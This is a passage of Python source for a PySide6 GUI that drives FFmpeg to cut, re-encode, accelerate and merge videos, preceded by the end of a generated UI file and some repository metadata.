u"\u81ea\u5b9a\u4e49\u6ee4\u955c\u9884\u7559", None)) self.VcodecpIFpushButton_4.setText(QCoreApplication.translate("VcodecpInterface", u"\u9009\u62e9\u7247\u5c3e", None)) self.VcodecpIFlabel_9.setText(QCoreApplication.translate("VcodecpInterface", u"\u8fde\u63a5\u7247\u5c3e", None)) self.VcodecpIFcheckBox_merge.setText(QCoreApplication.translate("VcodecpInterface", u"\u5408\u5e76\u89c6\u9891", None)) self.VcodecpIFtFormat.setText(QCoreApplication.translate("VcodecpInterface", u"test", None)) self.VcodecpIFpushButton_3.setText(QCoreApplication.translate("VcodecpInterface", u"\u9009\u62e9\u7247\u5934", None)) self.VcodecpIFtimeEdit_2.setDisplayFormat(QCoreApplication.translate("VcodecpInterface", u"H:mm:ss:zzz", None)) self.VcodecpIFlabel_8.setText(QCoreApplication.translate("VcodecpInterface", u"\u8fde\u63a5\u7247\u5934", None)) self.VcodecpIFClearFil.setText(QCoreApplication.translate("VcodecpInterface", u"\u6e05\u9664\u8bbe\u7f6e", None)) self.VcodecpIFradioButton.setText(QCoreApplication.translate("VcodecpInterface", u"\u7247\u5c3e\u65f6\u957f", None)) self.VcodecpIFcheckBox_extract.setText(QCoreApplication.translate("VcodecpInterface", u"\u5207\u5272\u89c6\u9891", None)) self.VcodecpIFradioButton_2.setText(QCoreApplication.translate("VcodecpInterface", u"\u7ed3\u675f\u65f6\u95f4", None)) # retranslateUi
35,063
Python
.py
516
59
167
0.753283
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,449
vcodecp_Interface.py
wish2333_VideoExtractAndConcat/modules/vcodecp_Interface.py
from modules.logger_config import logger import os from PySide6.QtCore import Qt, QThread, Signal, QObject, QTime from PySide6.QtGui import QPixmap, QPainter, QColor from PySide6.QtWidgets import QWidget, QFileDialog, QMessageBox, QListWidgetItem from qfluentwidgets import MessageBox from modules.config import ffpath from modules.ffmpegApi import FFmpeg from modules.Ui_vcodecpInterface import Ui_VcodecpInterface # 继承自QObject的子类,用于执行后台任务的子类 class Worker(QObject): started = Signal() # 任务开始时发出的信号 finished = Signal() # 任务完成时发出的信号 interrupted = Signal() # 任务被中断时发出的信号 callback = Signal() # 任务执行过程中输出的信号 def __init__(self, task_type, ffmpeg_path, ffprobe_path, *task_args, callback=None): super().__init__() self.task_type = task_type self.ffmpeg_path = ffmpeg_path self.ffprobe_path = ffprobe_path self.task_args = task_args logger.debug(f"{task_type} worker is created") self._started_flag = False # 任务是否开始的标志 self._interrupted_flag = False # 任务是否被中断的标志 self.callback = callback # 任务执行过程中输出的回调函数 self.is_interrupted = False # 任务被中断时的回调函数 def interrupt(self): self._interrupted_flag = True # 设置任务被中断的标志 self.ffmpeg_instance.update_interrupt_flag(self._interrupted_flag) # 更新全局中断标志 logger.debug('中止信号已发出') def interrupted_callback(self): logger.debug('中止信号回调,worker任务被中断') self.is_interrupted = True # 设置任务被中断的标志 if callable(self.callback): self.callback() self.interrupted.emit() # 发出中断信号 def run_ffmpeg_task(self): self._started_flag = True # 任务开始的标志 self.started.emit() # 任务开始,发出信号 if self.task_type == 'extract_video': self.extract_video(*self.task_args) elif self.task_type == 'cut_video': self.cut_video(*self.task_args) elif self.task_type == 'video_encode': self.video_encode(*self.task_args) elif self.task_type == 'accelerated_encode': self.accelerated_encode(*self.task_args) elif self.task_type == 'merge_video': self.merge_video(*self.task_args) elif self.task_type == 'concat_video': self.concat_video(*self.task_args) elif self.task_type =='merge_video_two': self.merge_video_two(*self.task_args) self.finished.emit() # 任务完成,发出信号 # 在这里可以添加更多任务类型的判断和调用 def extract_video(self, input_folder, output_folder, start_time, end_time, encoder, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.extract_video_single(input_folder, output_folder, start_time, end_time, encoder, overwrite) def cut_video(self, input_folder, output_folder, start_time, end_time, encoder, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.cut_video(input_folder, output_folder, start_time, end_time, encoder, overwrite) def video_encode(self, input_file, output_file, encoder, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.video_encode(input_file, output_file, encoder, overwrite) def accelerated_encode(self, input_file, output_file, rate, encoder, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.accelerated_encode(input_file, output_file, rate, encoder, overwrite) def merge_video(self, input_files, output_file, op_file, ed_file, encoder, resolution='1920:1080', fps='30', overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.merge_video(input_files, output_file, op_file, ed_file, encoder, resolution, fps, overwrite) def merge_video_two(self, op_files, output_file, ed_file, encoder, resolution='1920:1080', fps='30', overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.merge_video_two(op_files, output_file, ed_file, encoder, resolution, fps, overwrite) def concat_video(self, input_files, output_file, op_file, ed_file, encoder, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.concat_video(input_files, output_file, op_file, ed_file, encoder, overwrite) # 继承自QThread的子类,用于后台执行任务的线程类 class WorkerThread(QThread): def __init__(self, worker): super().__init__() self.worker = worker self.worker.interrupted.connect(self.handle_interrupt) # 任务被中断时停止线程 def run(self): try: self.worker.run_ffmpeg_task() except Exception as e: logger.error(f"Error occurred while running {self.worker.task_type} task: {e}") def handle_interrupt(self): self.quit() # 停止线程 class VcodecpInterface(QWidget, Ui_VcodecpInterface): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_variables() self.init_action() self.init_print() self.bind() # 必须给子界面设置全局唯一的对象名 # Custom_encoder def change_custom_encoder(self, vcodec, vpreset, resolution, fps, acodec, apreset,): custom_encoder = f'{vcodec}{vpreset}{resolution}{fps}{acodec}{apreset}' return custom_encoder # Init_variables def init_variables(self): # file self.input_file_args = [] self.output_file_args = [] # encoding self.custom_encoder = '' self.vcodec = '-vcodec libx264 ' self.vpreset ='-preset medium -crf 23 ' self.resolution = '' self.fps = '' self.acodec = '-acodec aac ' self.apreset ='-b:a 128k ' self.bitrate = '800000' self.quality = '23' # 循环 self.i = 0 self.is_paused = False # Init_action def init_action(self): self.VcodecpIFlineEdit.setEnabled(False) # 禁止修改分辨率 resolution_list = ['1280x720', '1920x1080', '2560x1440', '3840x2160', '720x1280', '1080x1920'] self.VcodecpIFlineEdit.addItems(resolution_list) # 添加分辨率选项 self.VcodecpIFlineEdit_2.setEnabled(False) # 禁止修改帧率 fps_list = ['30', '60', '24', '25', '50'] self.VcodecpIFlineEdit_2.addItems(fps_list) # 添加帧率选项 # format_list = ['mp4', 'avi', 'flv', 'webm', 'wmv', 'mkv'] # self.VcodecpIFtFormat.addItems(format_list) # 添加格式选项 self.VcodecpIFcomboBox_5.setEnabled(False) # 禁止修改profile self.VcodecpIFdoubleSpinBox.setEnabled(False) # 禁止修改加速倍率 self.VcodecpIFtimeEdit_3.setEnabled(False) # 禁止修改片头时长 self.VcodecpIFtimeEdit_2.setEnabled(False) # 禁止修改片尾时长 self.VcodecpIFpushButton_3.setEnabled(False) # 禁止添加片头 self.VcodecpIFpushButton_4.setEnabled(False) # 禁止添加片尾 self.VcodecpIFradioButton.setChecked(True) # 默认选择片尾时长 VideoCodecs = ['libx264', 'copy', 'h264_nvenc', 'hevc_nvenc', 'av1_nvenc', 'h264_amf', 'hevc_amf', 'av1_amf', 'h264_qsv', 'hevc_qsv', 'av1_qsv', 'libx265'] # 视频编码器,包括显卡编码 self.VcodecpIFlineEditVE.addItems(VideoCodecs) # 添加视频编码器选项 AudioCodecs = ['aac', 'copy', 'alac', 'flac', 'libmp3lame', 'libvorbis','libopus'] # 音频编码器 self.VcodecpIFlineEditAE.addItems(AudioCodecs) # 添加音频编码器选项 # Init_print def init_print(self): logger.debug("VideoCodecpInterface is initialized!") # Welcome message self.VcodecpIFconsole.appendPlainText("欢迎使用FFmpeg-python视频处理工具!") # encoder self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) # 判断ffmpeg文件是否存在 # if not (os.path.isfile(ffpath.ffmpeg_path) and os.path.isfile(ffpath.ffprobe_path)): # self.VcodecpIFconsole.appendPlainText("ffmpeg路径或ffprobe路径错误,请检查!") # logger.error("ffmpeg or ffprobe error, please check the path!") # else: # self.VcodecpIFconsole.appendPlainText(f"ffmpeg初始化:{ffpath.ffmpeg_path}") # self.VcodecpIFconsole.appendPlainText(f"ffprobe初始化:{ffpath.ffprobe_path}") # logger.info(f"ffmpeg and ffprobe initialized successfully!") # Bind Event def bind(self): # Bind Button Event self.VcodecpIFinputfile.clicked.connect(self.select_input_file) self.VcodecpIFinputclear.clicked.connect(self.clear_input_file) self.VcodecpIFoutputfolder.clicked.connect(self.select_output_folder) self.VcodecpIFpushBtn.clicked.connect(self.encoding) self.VcodecpIFClearFil.clicked.connect(self.clear_filter_config) self.VcodecpIFpushButton_3.clicked.connect(self.select_op_file) self.VcodecpIFpushButton_4.clicked.connect(self.select_ed_file) self.VcodecpIFpushBtn_2.clicked.connect(self.unfreeze_config) self.VcodecpIFSTBtn.clicked.connect(self.stop) # Check Event self.VcodecpIFcheckBox_2.clicked.connect(self.enable_resolution) self.VcodecpIFcheckBox_3.clicked.connect(self.enable_fps) self.VcodecpIFcheckBox.clicked.connect(self.enable_profile) self.VcodecpIFcheckBox_4.clicked.connect(self.enable_accelerated) self.VcodecpIFcheckBox_merge.clicked.connect(self.enable_merge) self.VcodecpIFcheckBox_extract.clicked.connect(self.enable_extract) # LineEdit/ComboBox/SpinBox Event self.VcodecpIFlineEdit.textChanged.connect(self.change_resolution) self.VcodecpIFlineEdit_2.textChanged.connect(self.change_fps) self.VcodecpIFlineEditVE.textChanged.connect(self.change_vcodec) self.VcodecpIFlineEditAE.textChanged.connect(self.change_acodec) self.VcodecpIFcomboBox_2.currentTextChanged.connect(self.change_vpreset) self.VcodecpIFcomboBox_3.currentTextChanged.connect(self.change_apreset) self.VcodecpIFspinBox.valueChanged.connect(self.change_bitrate) self.VcodecpIFspinBox_2.valueChanged.connect(self.change_quality) # self.VcodecpIFdoubleSpinBox.valueChanged.connect(self.change_accelerated) self.VcodecpIFcomboBox_5.currentTextChanged.connect(self.change_profile) # File_operation def select_input_file(self): self.append_input_file_args, _ = QFileDialog.getOpenFileNames(self, "选择输入文件", "", "All Files (*)") for file_path in self.append_input_file_args: if file_path not in self.input_file_args: self.input_file_args.append(file_path) item = QListWidgetItem(file_path) self.VcodecpIFinputlist.addItem(item) def select_output_folder(self): if self.input_file_args != []: output_folder = QFileDialog.getExistingDirectory(self, "选择输出文件夹", "") # 选择输出文件夹 if output_folder != '': # 输出文件夹不为空且输出文件夹与输入文件夹不同 self.output_file_args = [os.path.join(output_folder, os.path.basename(file_path)) for file_path in self.input_file_args] # 获得输出文件,输出文件名与输入文件名相同 self.VcodecpIFoutputfolder.setText(output_folder) else: self.VcodecpIFoutputfolder.setText('选择输出文件夹') else: MessageBox("警告", "请先选择输入文件!", parent=self).exec() def clear_input_file(self): self.input_file_args = [] self.output_file_args = [] self.VcodecpIFoutputfolder.setText('选择输出文件夹') self.VcodecpIFinputlist.clear() # Custom encoding Config # resolution def enable_resolution(self): if self.VcodecpIFcheckBox_2.isChecked(): self.VcodecpIFlineEdit.setEnabled(True) # 允许修改分辨率 self.resolution = f'-s {self.VcodecpIFlineEdit.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) else: self.VcodecpIFlineEdit.setEnabled(False) # 禁止修改分辨率 self.resolution = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) def change_resolution(self): if self.VcodecpIFcheckBox_2.isChecked(): self.resolution = f'-s {self.VcodecpIFlineEdit.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) # fps def enable_fps(self): if self.VcodecpIFcheckBox_3.isChecked(): self.VcodecpIFlineEdit_2.setEnabled(True) # 允许修改帧率 self.fps = f'-r {self.VcodecpIFlineEdit_2.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) else: self.VcodecpIFlineEdit_2.setEnabled(False) # 禁止修改帧率 self.fps = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) def change_fps(self): if self.VcodecpIFcheckBox_3.isChecked(): self.fps = f'-r {self.VcodecpIFlineEdit_2.text()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) # Video encoding Config def change_vpreset(self): self.quality = self.VcodecpIFspinBox_2.value() self.bitrate = self.VcodecpIFspinBox.value() * 1000 if self.VcodecpIFcomboBox_2.currentText() == 'CRF品质-medium' or self.VcodecpIFcomboBox_2.currentText() == 'CRF品质-fast' or self.VcodecpIFcomboBox_2.currentText() == 'CQP硬编品质(*qsv)': self.change_vpreset_sub(self.quality) else: self.change_vpreset_sub(self.bitrate) def change_vpreset_sub(self, rate): if self.VcodecpIFcomboBox_2.currentText() == 'CRF品质-medium': self.vpreset = f'-preset medium -crf {rate} ' elif self.VcodecpIFcomboBox_2.currentText() == 'CRF品质-fast': self.vpreset = f'-preset fast -crf {rate} ' elif self.VcodecpIFcomboBox_2.currentText() == 'CBR平均码率-medium': self.vpreset = f'-preset medium -b:v {rate} ' elif self.VcodecpIFcomboBox_2.currentText() == 'CBR平均码率-fast': self.vpreset = f'-preset fast -b:v {rate} ' elif self.VcodecpIFcomboBox_2.currentText() == 'CQP硬编品质(*qsv)': self.vpreset = f'-preset medium -qp {rate} ' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) def change_vcodec(self): if self.VcodecpIFlineEditVE.text() != 'copy': self.vcodec = f'-vcodec {self.VcodecpIFlineEditVE.text()} ' # 结尾要有空格 if self.vcodec in ['-vcodec h264_qsv', '-vcodec hevc_qsv', '-vcodec av1_qsv']: self.VcodecpIFcomboBox_2.setCurrentText('CQP硬编品质(*qsv)') self.change_vpreset() else: self.vcodec = '-vcodec copy ' self.vpreset = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) def change_bitrate(self): if self.VcodecpIFcomboBox_2.currentText() == 'CBR平均码率-medium' or self.VcodecpIFcomboBox_2.currentText() == 'CBR平均码率-fast': self.bitrate = self.VcodecpIFspinBox.value() * 1000 self.change_vpreset_sub(self.bitrate) def change_quality(self): if self.VcodecpIFcomboBox_2.currentText() == 'CRF品质-medium' or self.VcodecpIFcomboBox_2.currentText() == 'CRF品质-fast' or self.VcodecpIFcomboBox_2.currentText() == 'CQP硬编品质(*qsv)': self.quality = self.VcodecpIFspinBox_2.value() self.change_vpreset_sub(self.quality) # Audio encoding Config def change_acodec(self): if self.VcodecpIFlineEditAE.text() != 'copy': self.acodec = f'-acodec {self.VcodecpIFlineEditAE.text()} ' # 结尾要有空格 self.change_apreset() else: self.acodec = '-acodec copy ' self.apreset = '' self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) def change_apreset(self): self.apreset = f'-b:a {self.VcodecpIFcomboBox_3.currentText()} ' # 结尾要有空格 self.custom_encoder = self.change_custom_encoder(self.vcodec, self.vpreset, self.resolution, self.fps, self.acodec, self.apreset) self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) # Profile Config def enable_profile(self): if self.VcodecpIFcheckBox.isChecked(): self.VcodecpIFcomboBox_5.setEnabled(True) # 允许修改profile self.profile_changing() else: self.VcodecpIFcomboBox_5.setEnabled(False) # 禁止修改profile def change_profile(self): if self.VcodecpIFcheckBox.isChecked() and self.VcodecpIFcomboBox_5.currentTextChanged(): self.profile_changing() def profile_changing(self): if self.VcodecpIFcomboBox_5.currentText() == '默认': self.custom_encoder = r'-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k ' self.VcodecpIFplainTextEdit.setPlainText(self.custom_encoder) # Accelerated Config def enable_accelerated(self): if self.VcodecpIFcheckBox_4.isChecked(): self.VcodecpIFdoubleSpinBox.setEnabled(True) # 允许修改加速倍率 else: self.VcodecpIFdoubleSpinBox.setEnabled(False) # 禁止修改加速倍率 # def change_accelerated(self): # 简单转码任务 def simple_encoding(self): input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] + os.path.splitext(input_file)[-1] if os.path.isfile(input_file) and not self.VcodecpIFcheckBox_4.isChecked() and not self.VcodecpIFcheckBox_extract.isChecked() and not self.VcodecpIFcheckBox_merge.isChecked(): self.VcodecpIFconsole.appendPlainText("执行简单转码任务,请稍等...") self.worker = Worker('video_encode', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, self.VcodecpIFplainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}开始视频转码")) # 线程开始时显示提示信息 logger.info(f"Simple encoding task started, input file: {input_file}, output file: {output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}完成视频转码")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Accelerated encoding task finished, input file: {input_file}, output file: {output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 elif not os.path.isfile(input_file): MessageBox("错误", f"{input_file}不存在!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 # 加速转码任务 def accelerated_encoding(self): input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] + 'accelerated' + os.path.splitext(input_file)[-1] if os.path.isfile(input_file) and self.VcodecpIFcheckBox_4.isChecked() and self.VcodecpIFdoubleSpinBox.value() != 1 and not self.VcodecpIFcheckBox_extract.isChecked() and not self.VcodecpIFcheckBox_merge.isChecked(): self.VcodecpIFconsole.appendPlainText("执行加速转码任务,请稍等...") self.worker = Worker('accelerated_encode', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, '%.2f'%self.VcodecpIFdoubleSpinBox.value(), self.VcodecpIFplainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}开始视频加速转码")) # 线程开始时显示提示信息 logger.info(f"Accelerated encoding task started, input file: {input_file}, output file: {output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}完成视频加速转码")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Accelerated encoding task finished, input file: {input_file}, output file: {output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 elif not os.path.isfile(input_file): MessageBox("错误", f"{input_file}不存在!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 elif os.path.isfile(input_file) and self.VcodecpIFcheckBox_4.isChecked() and self.VcodecpIFdoubleSpinBox.value() == 1 and not self.VcodecpIFcheckBox_extract.isChecked() and not self.VcodecpIFcheckBox_merge.isChecked() and self.i == 0: MessageBox("警告", "加速倍率不能为1!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 def enable_extract(self): if self.VcodecpIFcheckBox_extract.isChecked(): self.VcodecpIFtimeEdit_3.setEnabled(True) # 允许修改切割片尾时长 self.VcodecpIFtimeEdit_2.setEnabled(True) # 允许修改切割结束时间 else: self.VcodecpIFtimeEdit_3.setEnabled(False) # 禁止修改切割片尾时长 self.VcodecpIFtimeEdit_2.setEnabled(False) # 禁止修改切割结束时间 # 切割任务 def extract_or_cut_video(self): input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] + 'extracted' + os.path.splitext(input_file)[-1] if os.path.isfile(input_file) and self.VcodecpIFcheckBox_extract.isChecked() and not self.VcodecpIFcheckBox_4.isChecked() and not self.VcodecpIFcheckBox_merge.isChecked(): if self.VcodecpIFtimeEdit_3.text() != '0:00:00:000' or self.VcodecpIFtimeEdit_2.text() != '0:00:00:000': # 如果选择了片尾时长,执行切割片尾模式 if self.VcodecpIFradioButton.isChecked(): self.VcodecpIFconsole.appendPlainText("执行切割任务,请稍等...") self.worker = Worker('extract_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, self.VcodecpIFtimeEdit_3.text(), self.VcodecpIFtimeEdit_2.text(), self.VcodecpIFplainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}开始视频切割")) # 线程开始时显示提示信息 logger.info(f"Extract video task started, input file: {input_file}, output file: {output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}完成视频切割")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Accelerated encoding task finished, input file: {input_file}, output file: {output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 # 如果选择了结束时间,执行时间段切割模式 elif self.VcodecpIFradioButton_2.isChecked(): self.VcodecpIFconsole.appendPlainText("执行切割任务,请稍等...") self.worker = Worker('cut_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, self.VcodecpIFtimeEdit_3.text(), self.VcodecpIFtimeEdit_2.text(), self.VcodecpIFplainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}开始视频切割")) # 线程开始时显示提示信息 logger.info(f"Cut video task started, input file: {input_file}, output file: {output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}完成视频切割")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Accelerated encoding task finished, input file: {input_file}, output file: {output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 elif not os.path.isfile(input_file): MessageBox("错误", f"{input_file}不存在!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 # 合并任务 def merge_or_concat_video(self): self.merge_input_file = self.input_file_args[self.i] self.merge_output_file = self.output_file_args[self.i] + 'merged' + os.path.splitext(self.merge_input_file)[-1] if self.VcodecpIFcheckBox_merge.isChecked() and not self.VcodecpIFcheckBox_extract.isChecked() and not self.VcodecpIFcheckBox_4.isChecked(): if self.VcodecpIFpushButton_3.text() != '选择片头' and self.VcodecpIFpushButton_4.text() != '选择片尾': self.merge_3_videos() elif self.VcodecpIFpushButton_3.text() != '选择片头' and self.VcodecpIFpushButton_4.text() == '选择片尾': self.merge_2_videos(True) elif self.VcodecpIFpushButton_3.text() == '选择片头' and self.VcodecpIFpushButton_4.text() != '选择片尾': self.merge_2_videos(False) else: MessageBox("错误", "请选择合并方式!即选择片头或片尾!", parent=self).exec() self.debugflag_of_filter_config = False self.i = 0 # 循环计数器清零 # else: # self.VcodecpIFconsole.appendPlainText("执行合并任务,请稍等...") # self.worker = Worker('concat_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, self.op_file, self.ed_file, r'vcodec=copy acodec=copy') # 开启子进程 # self.thread = WorkerThread(self.worker) # self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}开始视频合并")) # 线程开始时显示提示信息 # logger.info(f"Merge video task started, input file: {input_file}, output file: {output_file}") # self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 # self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{input_file}完成视频合并")) # 线程结束时显示提示信息 # self.thread.finished.connect(lambda: logger.info(f"Accelerated encoding task finished, input file: {input_file}, output file: {output_file}")) # self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 # self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 # self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 # self.thread.start() # 开始线程 def enable_merge(self): if self.VcodecpIFcheckBox_merge.isChecked(): self.VcodecpIFpushButton_3.setEnabled(True) # 允许添加片头 self.VcodecpIFpushButton_4.setEnabled(True) # 允许片尾 else: self.VcodecpIFpushButton_3.setEnabled(False) # 禁止添加片头 self.VcodecpIFpushButton_4.setEnabled(False) # 禁止添加片尾 def select_op_file(self): self.op_file = QFileDialog.getOpenFileName(self, "选择片头文件", "", "媒体文件 (*.mp4 *.avi *.flv *.mkv *.wmv)")[0] self.VcodecpIFpushButton_3.setText(f'{os.path.basename(self.op_file)}') def select_ed_file(self): self.ed_file = QFileDialog.getOpenFileName(self, "选择片尾文件", "", "媒体文件 (*.mp4 *.avi *.flv *.mkv *.wmv)")[0] self.VcodecpIFpushButton_4.setText(f'{os.path.basename(self.ed_file)}') def merge_3_videos(self): if os.path.isfile(self.merge_input_file) and os.path.isfile(self.op_file) and os.path.isfile(self.ed_file): self.VcodecpIFconsole.appendPlainText("执行合并任务,请稍等...") if self.VcodecpIFcheckBox_2.isChecked() and self.VcodecpIFcheckBox_3.isChecked(): resolution = self.VcodecpIFlineEdit.text().replace('x', ':') # 将resolution的x改为: self.worker = Worker('merge_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.op_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, self.VcodecpIFlineEdit_2.text()) # 开启子进程 elif self.VcodecpIFcheckBox_2.isChecked() and not self.VcodecpIFcheckBox_3.isChecked(): resolution = self.VcodecpIFlineEdit.text().replace('x', ':') # 将resolution的x改为: self.worker = Worker('merge_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.op_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution) # 开启子进程 elif not self.VcodecpIFcheckBox_2.isChecked() and self.VcodecpIFcheckBox_3.isChecked(): resolution = '1920:1080' # 默认值 self.worker = Worker('merge_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.op_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, self.VcodecpIFlineEdit_2.text()) # 开启子进程 elif not self.VcodecpIFcheckBox_2.isChecked() and not self.VcodecpIFcheckBox_3.isChecked(): resolution = '1920:1080' # 默认值 fps = 30 # 默认值 self.worker = Worker('merge_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.op_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, fps) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{self.merge_input_file}开始视频合并")) # 线程开始时显示提示信息 logger.info(f"Merge video task started, input file: {self.merge_input_file}, output file: {self.merge_output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{self.merge_input_file}完成视频合并")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Merge video task finished, input file: {self.merge_input_file}, output file: {self.merge_output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 